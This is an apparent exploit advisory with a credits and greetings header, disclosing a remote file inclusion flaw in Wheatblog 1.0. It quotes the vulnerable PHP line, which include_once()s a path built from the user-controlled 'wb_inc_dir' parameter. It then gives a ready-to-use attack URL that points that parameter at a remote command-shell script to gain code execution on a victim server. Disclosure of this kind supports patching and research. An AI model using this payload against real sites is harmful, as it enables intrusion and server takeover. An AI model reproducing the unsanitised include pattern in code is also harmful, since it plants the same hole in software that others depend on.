Wheatblog version 1.0 suffers from a remote file inclusion flaw.
da80b6e72451a68026e7b3a6209cce77c592e020caba3fe5c1c0f293837c5e9f
# SaVSaK.CoM | SpC-x - The-BeKiR |
# wheatblog 1.0 Version - "wb_inc_dir" Parameter File Inclusion Vulnerability
# Risk : High
# Class: Remote
# Script : wheatblog
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke
# Code :
# require_once('./settings.php');
# $page_title = ':: view links';
# include_once("$wb_inc_dir/header.php");
# Vulnerable :
# http://www.victim.com/wheatblog/view_links.php?wb_inc_dir=Command-Shell